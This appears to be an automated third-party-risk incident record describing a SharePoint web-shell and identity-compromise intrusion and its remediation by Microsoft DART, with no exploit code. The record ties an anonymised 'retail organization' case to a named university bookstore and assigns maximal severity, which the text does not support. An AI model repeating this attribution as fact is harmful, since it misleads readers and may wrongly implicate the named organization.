A retail company fell victim to a sophisticated, multi-stage cyberattack exploiting unpatched SharePoint vulnerabilities (CVE-2025-49706, CVE-2025-49704) and compromised identities. The attack began with a malicious ASPX web shell on their SharePoint server, enabling remote code execution and identity spoofing. Attackers then abused self-service password resets, mapped the organization’s identity structure via Microsoft Entra ID/Graph API, and escalated access using Azure Virtual Desktop, RDP, PsExec, and SQL Server Management Studio. Persistence was maintained through tools like Teleport, Azure CLI, and Rsocx proxy, with credential manipulation confirmed via Entra ID risk events. The attack disrupted operations, risked lateral movement across privileged accounts (9/20 accounts had elevated access without proper tiering), and exposed the company to potential data exfiltration or ransomware deployment (evidenced by reverse-engineered ransomware targeting ESXi directories). Microsoft’s DART team intervened to contain the threat, revoke compromised credentials, and enforce Zero Trust controls, but the incident highlighted critical gaps in patching, identity segmentation, and real-time detection leaving the organization vulnerable to systemic compromise and operational outages.
TPRM report: https://www.rankiteo.com/company/university-of-arizona-bookstores
"id": "uni1402314092525",
"linkid": "university-of-arizona-bookstores",
"type": "Cyber Attack",
"date": "6/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"{'affected_entities': [{'industry': 'Retail', 'type': 'Retail Organization'}],
'attack_vector': ['Exploitation of Unpatched Vulnerabilities (CVE-2025-49706, '
'CVE-2025-49704)',
'Compromised Identities',
'Self-Service Password Reset Abuse',
'Microsoft Entra ID and Graph API Exploitation',
'Azure Virtual Desktop and RDP Misuse',
'Custom Obfuscated Web Shells'],
'customer_advisories': ['Download the full DART report for detailed insights '
'and protection strategies.',
'Attend Microsoft Secure (September 30) and Microsoft '
'Ignite (November 17–21) for AI-first security '
'solutions.'],
'description': 'A retail organization detected a major persistent cyberthreat '
"through a Microsoft Defender Experts alert titled 'Possible "
"web shell installation.' The investigation revealed a "
'malicious ASPX file on their SharePoint server linked to '
'vulnerabilities CVE-2025-49706 and CVE-2025-49704, allowing '
'cyberattackers to spoof identities and inject remote code. In '
'a separate but related incident (Reactive 2), attackers '
'exploited a compromised identity, abused self-service '
'password reset features, and mapped the organization’s '
'identity structure using Microsoft Entra ID and Microsoft '
'Graph API. The attackers escalated access via Azure Virtual '
'Desktop and RDP, deployed tools like PsExec and SQL Server '
'Management Studio, and maintained persistence using Teleport, '
'Azure CLI, and Rsocx proxy. Microsoft’s Detection and '
'Response Team (DART) intervened to contain the threat, '
'reclaim identity systems, and neutralize attacker access '
'through measures like Active Directory takeback, Entra ID '
'isolation, and revoking compromised tokens. Custom obfuscated '
'web shells bypassed basic detection, underscoring the need '
'for behavioral analytics.',
'impact': {'brand_reputation_impact': 'High (Given the sophisticated and '
'persistent nature of the attack, '
'likely erosion of trust)',
'identity_theft_risk': 'High (Credential manipulation and '
'directory exploration confirmed)',
'operational_impact': 'Significant (Lateral movement, persistence, '
'and potential operational disruption in '
'retail environment)',
'systems_affected': ['SharePoint Server',
'Microsoft Entra ID',
'Azure Virtual Desktop',
'RDP',
'SQL Server',
'Active Directory']},
'initial_access_broker': {'backdoors_established': ['Teleport',
'Rsocx Proxy',
'Custom Web Shells'],
'entry_point': ['Exploited SharePoint '
'Vulnerabilities (CVE-2025-49706, '
'CVE-2025-49704)',
'Compromised Identity via '
'Self-Service Password Reset Abuse'],
'high_value_targets': ['Microsoft Entra ID',
'Azure Virtual Desktop',
'Active Directory',
'ESXi Directories']},
'investigation_status': 'Completed (By Microsoft DART)',
'lessons_learned': ['Prompt patching of known exploited vulnerabilities '
'(e.g., SharePoint) is critical.',
'Identity segmentation and least privileged access '
'principles reduce lateral movement risk (9/20 accounts '
'had elevated access without proper tiering).',
'Behavioral analytics are essential to detect custom '
'obfuscated web shells and evolving tactics.',
'Real-time detection and response are vital due to the '
"speed of 'hands-on keyboard' attacker behavior.",
'Centralized logging, threat intelligence, and evidence '
'preservation strengthen incident response.',
'Regular vulnerability scans and EDR deployment across '
'all devices mitigate exposure.'],
'post_incident_analysis': {'corrective_actions': ['Patching vulnerable '
'systems and enforcing Zero '
'Trust principles.',
'Mass password reset with '
'identity re-attestation.',
'Deprivileging accounts and '
'revoking compromised '
'tokens.',
'Enhancing monitoring with '
'behavioral analytics and '
'threat intelligence.',
'Implementing MFA and least '
'privileged access '
'controls.'],
'root_causes': ['Unpatched SharePoint '
'vulnerabilities (CVE-2025-49706, '
'CVE-2025-49704).',
'Weak identity management (lack of '
'separation between standard and '
'privileged users).',
'Abuse of self-service password '
'reset features.',
'Insufficient detection '
'capabilities for obfuscated web '
'shells.']},
'ransomware': {'data_encryption': 'Targeted Attacks on ESXi Directories '
'(Observed During Reverse Engineering)'},
'recommendations': ['Deploy Endpoint Detection and Response (EDR) across all '
'devices.',
'Conduct regular vulnerability scans and patch known '
'vulnerabilities promptly.',
'Strengthen identity and access controls (e.g., enforce '
'MFA, remove inactive credentials, apply least privileged '
'access).',
'Implement centralized logging and threat intelligence '
'integration.',
'Preserve evidence and maintain a robust incident '
'response plan.',
'Monitor for behavioral anomalies, suspicious processes, '
'and malware indicators.',
'Segment identities to separate standard and privileged '
'users.',
'Adopt Zero Trust principles (e.g., MFA enforcement, '
'continuous authentication).',
'Engage expert support (e.g., Microsoft DART) for '
'forensic analysis and threat eviction.'],
'references': [{'source': 'Microsoft Security Blog – Cyberattack Series '
'(Retail Cases)'},
{'source': 'Retail Cybersecurity Statistics: Market Data '
'Report 2025'},
{'source': 'Microsoft DART Full Report (Reactive 1 and '
'Reactive 2 Cases)'}],
'response': {'containment_measures': ['Active Directory Takeback',
'Entra ID Isolation',
'Deprivileging Compromised Accounts',
'Token Revocation',
'Removal of Malicious Web Shells '
'(within hours)',
'Neutralization of Persistence '
'Mechanisms (e.g., Teleport, MFA device '
'registration)'],
'enhanced_monitoring': 'Yes (Behavioral Analytics for Detecting '
'Obfuscated Web Shells and Rapidly '
'Evolving Tactics)',
'incident_response_plan_activated': 'Yes (Microsoft DART engaged '
'swiftly)',
'recovery_measures': ['Deployment of Proprietary Forensic Tools '
'for Root Cause Analysis',
'Operational Recovery Guidance',
'Threat Intelligence Integration from '
'Defender and Microsoft Sentinel'],
'remediation_measures': ['Patching Vulnerable Systems '
'(SharePoint, etc.)',
'Phased Mass Password Reset with User '
'Identity Re-attestation',
'Security Configuration Enhancements '
'Aligned with Zero Trust (e.g., MFA '
'Enforcement)',
'Reverse Engineering of Ransomware for '
'Mitigation Strategies'],
'third_party_assistance': 'Yes (Microsoft DART provided forensic '
'insights and actionable guidance)'},
'title': 'Major Persistent Cyberthreat Exploiting Unpatched SharePoint '
'Vulnerabilities and Compromised Identities in Retail Sector',
'type': ['Cyber Espionage',
'Persistence',
'Identity Compromise',
'Web Shell Attack',
'Lateral Movement'],
'vulnerability_exploited': ['CVE-2025-49706',
'CVE-2025-49704',
'Weak Identity Management (Lack of Privileged '
'Account Separation)',
'Unsecured Self-Service Password Reset']}